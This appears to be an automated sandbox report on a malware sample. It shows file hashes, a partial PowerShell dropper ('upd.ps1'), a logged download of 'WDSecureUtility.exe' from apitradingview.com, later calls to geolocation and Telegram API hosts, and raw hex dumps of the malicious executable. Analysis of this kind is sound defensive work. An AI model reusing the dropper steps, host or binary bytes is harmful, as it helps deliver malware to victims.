                                                          Encrypted:false
                                                          SSDEEP:96:tolrCNP8HkvhkvCCtPnm1dXjHZc61dXEHZcD:tolGPYPnm1Xc61UcD
                                                          MD5:3822C3C37B0981367966D5383B738BA5
                                                          SHA1:945C18F1E57900C6E87D3A0255A24C47660943DC
                                                          SHA-256:F854991FFBF84F94F74507C3ED1872F489B921FFF1C0F9154B82F2849AFF00CC
                                                          SHA-512:75557C00FC507D45F0245802A4DC2B17D9B73F8D4DF24DB23C146F21D013ADA5A6CDA119CCF1280CE2E04D6A1A8653202D5DD4C2BF4160EA78A983B373EEA061
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. ......Yd......r....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd......m......!r........t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BdYFE..........................d...A.p.p.D.a.t.a...B.V.1.....dYDE..Roaming.@......EW)BdYDE..........................Z`..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)BdYAE............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)BdYAE............................F.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)BdYAE....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)BdYAE....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BdYGE.....0..........

                                                          C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):240640
                                                          Entropy (8bit):5.163089509953704
                                                          Encrypted:false
                                                          SSDEEP:1536:BmDUeGs1J7fIwquWnkJwXkbLV6ZmB9IADS1u0TjfZ3LWj3Le5eRjIIVwObSqI+nU:MDx1J7fIwpq+8KAh3LAEctWO3/ET
                                                          MD5:0FF0576F91E4F548CA0D223462B2586C
                                                          SHA1:D9D79541127FEBDB03E0C0DE663D42B4B33FEAD9
                                                          SHA-256:10273F0F52AECAAF9688F7BBC250BC1E75C3CFD054831C78FFFADADFB65D07A6
                                                          SHA-512:0C41762E9967AAC27F9D064EF89E6C8CC145D906FCFA1F6420ADD3BC13E0B8D4C6FE62E828AEC555722F90A98B7B6CBA73EC3799EBF1D0A40FAB3F191BDAD1E2
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 68%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....(.g..............0.................. ........@.. ....................................`.....................................O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H............B......[.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. .s.. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*..{....*..{....*V.(......}......}....*.0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. (... )UU.

                                                          Static File Info

                                                          General

                                                          File type:Unicode text, UTF-8 text, with CRLF line terminators
                                                          Entropy (8bit):5.470113038070015
                                                          TrID:
                                                            File name:upd.ps1
                                                            File size:1'111 bytes
                                                            MD5:901388115be5c8209d83642d8d5d9b51
                                                            SHA1:d2293a97b9772328bb60e822027063deffba0c4d
                                                            SHA256:b54e7cd114b771b8b81e8c9b461ab611c3a5fddc575bdf1da132f5863c5d1e72
                                                            SHA512:798c57ea2b8cce8fc050ac4bdb2b054bfa8b808c404dafcfa4b423ec1197e11a7150a12578963a0b5b863c465a705cc618e7d00c168635ffc6eb60f118a46d1c
                                                            SSDEEP:24:kMTpdMroh+0O3MGFHPv6g1boyAace/CbVna2N9FAF7DvlRvM3:f7tOv9PvBFX/CbVxxAFftRvM3
                                                            TLSH:8D21EE222716156B43606B576C81A909FEAF88FF27B64258341CD81E2F72A38671D59C
                                                            File Content Preview:# .................... .................. .......... ...... .......... ............$randomDigits = Get-Random -Minimum 100 -Maximum 999..$exeName = "WDSecureUtility_$randomDigits.exe"..$exePath = "$env:AppData\$exeName"....try {.. # ................ ..

                                                            File Icon

                                                            Icon Hash:3270d6baae77db44

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-11-04T09:42:32.976382+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.849708TCP
                                                            2024-11-04T09:43:13.139898+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.849713TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 4, 2024 09:42:16.990526915 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:16.990561008 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:16.990648031 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:17.002676010 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:17.002686977 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:17.932914972 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:17.933043003 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:17.944354057 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:17.944371939 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:17.944724083 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:17.956399918 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.003324032 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.231143951 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.286372900 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.286401987 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.333260059 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.378359079 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.378372908 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.378439903 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.378451109 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.378465891 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.378465891 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.378499985 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.378571033 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.426997900 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.500061989 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.500077009 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.500099897 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.500106096 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.500125885 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.500133038 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.500165939 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.500168085 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.500188112 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.500647068 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.621895075 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.621907949 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.621948004 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.622152090 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.622152090 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.622179985 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.622195959 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.622232914 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.743983984 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.744012117 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.744100094 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.744117975 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.744169950 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.865384102 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.865407944 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.865498066 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.865525007 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.865600109 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.987020016 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.987042904 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.987303972 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:18.987330914 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:18.987387896 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.109865904 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.109889984 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.109961987 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.109989882 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.110037088 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.151238918 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.151256084 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.151357889 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.151379108 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.151449919 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.232417107 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.232434988 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.232544899 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.232568979 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.232656002 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.354371071 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.354398966 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.354465008 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.354492903 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.354518890 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.354600906 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.476677895 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.476703882 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.476783037 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.476815939 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.476869106 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.563097954 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.563124895 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.563275099 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.563303947 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.563378096 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.599303007 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.599345922 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.599512100 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.599513054 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.599545002 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.599602938 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.720149040 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.720267057 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.720304012 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.720331907 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.720347881 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.720350981 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.720402002 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.720410109 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.770797014 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.807410002 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.807483912 CET4434970586.104.15.60192.168.2.8
                                                            Nov 4, 2024 09:42:19.807514906 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.807564974 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:19.822011948 CET49705443192.168.2.886.104.15.60
                                                            Nov 4, 2024 09:42:20.659645081 CET49706443192.168.2.8172.67.70.233
                                                            Nov 4, 2024 09:42:20.659686089 CET44349706172.67.70.233192.168.2.8
                                                            Nov 4, 2024 09:42:20.659745932 CET49706443192.168.2.8172.67.70.233
                                                            Nov 4, 2024 09:42:20.665431023 CET49706443192.168.2.8172.67.70.233
                                                            Nov 4, 2024 09:42:20.665446997 CET44349706172.67.70.233192.168.2.8
                                                            Nov 4, 2024 09:42:21.282097101 CET44349706172.67.70.233192.168.2.8
                                                            Nov 4, 2024 09:42:21.282160044 CET49706443192.168.2.8172.67.70.233
                                                            Nov 4, 2024 09:42:21.285916090 CET49706443192.168.2.8172.67.70.233
                                                            Nov 4, 2024 09:42:21.285929918 CET44349706172.67.70.233192.168.2.8
                                                            Nov 4, 2024 09:42:21.286176920 CET44349706172.67.70.233192.168.2.8
                                                            Nov 4, 2024 09:42:21.333233118 CET49706443192.168.2.8172.67.70.233
                                                            Nov 4, 2024 09:42:21.335386038 CET49706443192.168.2.8172.67.70.233
                                                            Nov 4, 2024 09:42:21.383332014 CET44349706172.67.70.233192.168.2.8
                                                            Nov 4, 2024 09:42:21.507430077 CET44349706172.67.70.233192.168.2.8
                                                            Nov 4, 2024 09:42:21.507558107 CET44349706172.67.70.233192.168.2.8
                                                            Nov 4, 2024 09:42:21.507618904 CET49706443192.168.2.8172.67.70.233
                                                            Nov 4, 2024 09:42:21.509412050 CET49706443192.168.2.8172.67.70.233
                                                            Nov 4, 2024 09:42:25.115395069 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:25.115463018 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:25.115542889 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:25.116070986 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:25.116092920 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:25.951282978 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:25.951371908 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:25.957879066 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:25.957899094 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:25.958167076 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:25.965210915 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:26.011332035 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:26.202136993 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:26.203299046 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:26.203341007 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:26.203552008 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:26.203572989 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:26.203682899 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:26.203764915 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:26.203859091 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:26.203871965 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:26.203876019 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:26.203888893 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:26.203967094 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:26.203983068 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:26.203988075 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:26.203999043 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:26.204049110 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:26.204058886 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:26.204144001 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:26.204159021 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:26.204166889 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:26.204171896 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:26.204194069 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:26.204201937 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:26.204272032 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:26.204279900 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:26.204288960 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:26.204299927 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:26.204334974 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:26.204343081 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:26.958368063 CET44349707149.154.167.220192.168.2.8
                                                            Nov 4, 2024 09:42:27.005130053 CET49707443192.168.2.8149.154.167.220
                                                            Nov 4, 2024 09:42:27.054579020 CET49707443192.168.2.8149.154.167.220

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 4, 2024 09:42:16.966223001 CET5180953192.168.2.81.1.1.1
                                                            Nov 4, 2024 09:42:16.978624105 CET53518091.1.1.1192.168.2.8
                                                            Nov 4, 2024 09:42:20.639375925 CET5241953192.168.2.81.1.1.1
                                                            Nov 4, 2024 09:42:20.646306992 CET53524191.1.1.1192.168.2.8
                                                            Nov 4, 2024 09:42:25.107636929 CET5776353192.168.2.81.1.1.1
                                                            Nov 4, 2024 09:42:25.114737034 CET53577631.1.1.1192.168.2.8

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 4, 2024 09:42:16.966223001 CET192.168.2.81.1.1.10xd7c5Standard query (0)apitradingview.comA (IP address)IN (0x0001)false
                                                            Nov 4, 2024 09:42:20.639375925 CET192.168.2.81.1.1.10xe4daStandard query (0)get.geojs.ioA (IP address)IN (0x0001)false
                                                            Nov 4, 2024 09:42:25.107636929 CET192.168.2.81.1.1.10x9c9cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 4, 2024 09:42:16.978624105 CET1.1.1.1192.168.2.80xd7c5No error (0)apitradingview.com86.104.15.60A (IP address)IN (0x0001)false
                                                            Nov 4, 2024 09:42:20.646306992 CET1.1.1.1192.168.2.80xe4daNo error (0)get.geojs.io172.67.70.233A (IP address)IN (0x0001)false
                                                            Nov 4, 2024 09:42:20.646306992 CET1.1.1.1192.168.2.80xe4daNo error (0)get.geojs.io104.26.1.100A (IP address)IN (0x0001)false
                                                            Nov 4, 2024 09:42:20.646306992 CET1.1.1.1192.168.2.80xe4daNo error (0)get.geojs.io104.26.0.100A (IP address)IN (0x0001)false
                                                            Nov 4, 2024 09:42:25.114737034 CET1.1.1.1192.168.2.80x9c9cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • apitradingview.com
                                                            • get.geojs.io
                                                            • api.telegram.org

                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.84970586.104.15.604437300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-04 08:42:17 UTC182OUTGET /WDSecureUtility.exe HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: apitradingview.com
                                                            Connection: Keep-Alive
                                                            2024-11-04 08:42:18 UTC404INHTTP/1.1 200 OK
                                                            Connection: close
                                                            content-type: application/x-msdownload
                                                            last-modified: Wed, 23 Oct 2024 17:12:35 GMT
                                                            accept-ranges: bytes
                                                            content-length: 240640
                                                            date: Mon, 04 Nov 2024 08:42:18 GMT
                                                            server: LiteSpeed
                                                            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                            2024-11-04 08:42:18 UTC964INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f3 28 19 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 00 02 00 00 aa 01 00 00 00 00 00 de 1f 02 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 04 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL(g0 @ `
                                                            2024-11-04 08:42:18 UTC14994INData Raw: 00 00 0a 02 7b 10 00 00 0a 06 7b 10 00 00 0a 6f 09 00 00 0a 2a 16 2a 17 2a d2 20 28 f6 09 9f 20 29 55 55 a5 5a 28 06 00 00 0a 02 7b 0f 00 00 0a 6f 0a 00 00 0a 58 20 29 55 55 a5 5a 28 08 00 00 0a 02 7b 10 00 00 0a 6f 0b 00 00 0a 58 2a 00 00 13 30 07 00 62 00 00 00 02 00 00 11 14 72 4d 00 00 70 18 8d 01 00 00 01 25 16 02 7b 0f 00 00 0a 0a 12 00 25 71 04 00 00 1b 8c 04 00 00 1b 2d 04 26 14 2b 0b fe 16 04 00 00 1b 6f 0c 00 00 0a a2 25 17 02 7b 10 00 00 0a 0b 12 01 25 71 05 00 00 1b 8c 05 00 00 1b 2d 04 26 14 2b 0b fe 16 05 00 00 1b 6f 0c 00 00 0a a2 28 0d 00 00 0a 2a 1e 02 7b 11 00 00 0a 2a 1e 02 7b 12 00 00 0a 2a 56 02 28 04 00 00 0a 02 03 7d 11 00 00 0a 02 04 7d 12 00 00 0a 2a 13 30 03 00 41 00 00 00 04 00 00 11 03 75 07 00 00 1b 0a 02 06 2e 34 06 2c 2f 28
                                                            Data Ascii: {{o*** ( )UUZ({oX )UUZ({oX*0brMp%{%q-&+o%{%q-&+o(*{*{*V(}}*0Au.4,/(
                                                            2024-11-04 08:42:18 UTC16384INData Raw: 25 80 5c 00 00 04 28 14 00 00 2b 7e 5d 00 00 04 25 2d 17 26 7e 58 00 00 04 fe 06 a5 00 00 06 73 a7 00 00 0a 25 80 5d 00 00 04 28 15 00 00 2b 28 16 00 00 2b 0d 09 2d 02 14 2a 09 72 d8 4d 00 70 28 43 02 00 06 14 6f 33 00 00 0a 0d 09 18 18 6f a9 00 00 0a 20 03 02 00 00 28 aa 00 00 0a 18 5a 13 04 09 1c 11 04 6f a9 00 00 0a 13 05 09 6f 42 00 00 0a 1c 11 04 58 1f 24 58 59 13 06 09 1c 11 04 58 1a 58 11 06 58 6f ab 00 00 0a 13 07 08 6f 24 02 00 06 7e 5e 00 00 04 25 2d 17 26 7e 58 00 00 04 fe 06 a6 00 00 06 73 a5 00 00 0a 25 80 5e 00 00 04 28 14 00 00 2b 7e 5f 00 00 04 25 2d 17 26 7e 58 00 00 04 fe 06 a7 00 00 06 73 a7 00 00 0a 25 80 5f 00 00 04 28 15 00 00 2b 28 16 00 00 2b 13 08 11 08 2d 02 14 2a 11 08 72 d8 4d 00 70 28 43 02 00 06 14 6f 33 00 00 0a 13 08 11 08
                                                            Data Ascii: %\(+~]%-&~Xs%](+(+-*rMp(Co3o (ZooBX$XYXXXoo$~^%-&~Xs%^(+~_%-&~Xs%_(+(+-*rMp(Co3
                                                            2024-11-04 08:42:18 UTC16384INData Raw: 25 2d 18 26 06 06 fe 06 84 01 00 06 73 7a 01 00 0a 25 13 06 7d f4 00 00 04 11 06 28 32 00 00 2b 6f 7b 01 00 0a 13 05 2b 2e 11 05 6f 7c 01 00 0a 13 07 11 04 6f ee 00 00 0a 11 04 6f ed 00 00 0a 12 07 28 67 01 00 0a 12 07 28 69 01 00 0a 73 5b 01 00 06 13 08 de 3e 11 05 6f 78 00 00 0a 2d c9 de 0c 11 05 2c 07 11 05 6f 3b 00 00 0a dc 12 03 28 7d 01 00 0a 3a 6b ff ff ff de 0e 12 03 fe 16 44 00 00 1b 6f 3b 00 00 0a dc 12 09 fe 15 5f 00 00 02 11 09 2a 11 08 2a 00 00 01 1c 00 00 02 00 a1 00 3b dc 00 0c 00 00 00 00 02 00 5a 00 9c f6 00 0e 00 00 00 00 1b 30 04 00 9f 00 00 00 60 00 00 11 73 85 01 00 06 0a 06 02 7d f5 00 00 04 06 7b f5 00 00 04 28 75 01 00 06 28 33 00 00 2b 0b 07 06 7b f6 00 00 04 25 2d 16 26 06 06 fe 06 86 01 00 06 73 7e 01 00 0a 25 0d 7d f6 00 00 04
                                                            Data Ascii: %-&sz%}(2+o{+.o|oo(g(is[>ox-,o;(}:kDo;_**;Z0`s}{(u(3+{%-&s~%}
